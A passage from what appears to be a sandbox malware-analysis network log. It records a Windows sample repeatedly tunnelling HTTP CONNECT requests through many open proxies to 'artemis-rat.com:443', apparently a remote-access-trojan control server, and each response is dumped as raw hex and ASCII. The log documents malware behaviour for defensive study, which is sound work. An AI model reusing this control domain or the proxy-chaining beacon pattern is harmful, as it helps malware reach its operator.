                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.846350908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1451192.168.2.454392138.2.73.15710807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.062939882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1452192.168.2.454396114.55.84.12300017284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.063021898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.431211948 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1453192.168.2.454546172.67.181.58807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.063172102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.217426062 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1454192.168.2.454558104.16.108.234807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.065649033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.220164061 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1455192.168.2.45476631.7.65.184437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.065772057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1456192.168.2.45329065.169.38.73265927284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.065908909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1457192.168.2.454436185.101.16.52807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.065942049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1458192.168.2.454579185.162.228.48807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.065963984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.220551014 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1459192.168.2.45448727.96.235.171807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.066250086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1460192.168.2.45369272.217.158.20241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.066482067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1461192.168.2.45450166.45.246.19488887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.066653013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1462192.168.2.454601203.30.190.30807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.066653013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.221162081 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1463192.168.2.45450938.162.18.16031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.066739082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.478703976 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1464192.168.2.45479181.143.236.2004437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.066807985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1465192.168.2.454361103.204.55.22110807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.067851067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1466192.168.2.45445765.1.244.232807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.071199894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.456852913 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0
                                              Mar 11, 2024 08:37:24.517231941 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ee b4 b3 19 f4 c2 cf 8c 99 a6 c7 98 6f 2a db 7f e2 ec 80 48 60 14 9f 6a 48 45 64 67 0f aa b9 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                              Data Ascii: lheo*H`jHEdg*,+0/$#('=<5/artemis-rat.com#5+lxLpx %W7xIW|.BI)ZI#4f"c:%)v
                                              Mar 11, 2024 08:37:24.900475025 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 2c d7 e7 0f 39 95 d2 94 25 86 4c da 02 dc d7 3b 7d 03 f6 13 a1 dc f4 4b 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                              Data Ascii: =9,9%L;}KDOWNGRD0000*H010Uartemis-rat.com0240311064300Z260311064300Z010Uartemis-rat.com0"0*H0t+ovVt9
                                              Mar 11, 2024 08:37:25.186873913 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 06 ca a5 1e 03 89 ad 67 28 55 22 b1 42 4b 7f 06 78 2e f6 40 22 23 2e d6 e4 93 95 ce 82 fe c8 0a 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 fa 0e b2 e8 ad 1e 6f 5b da 9f c7 97 4e e7 c5 b0 10 10 71 7a 20
                                              Data Ascii: %! g(U"BKx.@"#.(o[Nqz 4R?KN1
                                              Mar 11, 2024 08:37:25.568836927 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 72 38 39 ea f7 4b 69 db 25 57 bf 20 1c 63 c0 5a 9c 59 18 c1 8f cc a7 f3 5a fd 13 66 6b ee 10 e9 f6 52 b8 3f 1a ac 3e d6
                                              Data Ascii: (r89Ki%W cZYZfkR?>
                                              Mar 11, 2024 08:37:26.627233982 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 72 38 39 ea f7 4b 69 db 25 57 bf 20 1c 63 c0 5a 9c 59 18 c1 8f cc a7 f3 5a fd 13 66 6b ee 10 e9 f6 52 b8 3f 1a ac 3e d6
                                              Data Ascii: (r89Ki%W cZYZfkR?>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1467192.168.2.453959212.110.188.198344057284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.072367907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.933425903 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1468192.168.2.454643132.148.16.169556107284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.072477102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.569638014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.257234097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.366485119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.554141998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.663333893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.757108927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.866457939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.069760084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1469192.168.2.454665104.17.248.164807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.073698997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.232916117 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1470192.168.2.454562104.248.235.220807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.073699951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.299216986 CET343INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.14.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 182
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1471192.168.2.45443493.171.220.22988887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.074048996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.484119892 CET327INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
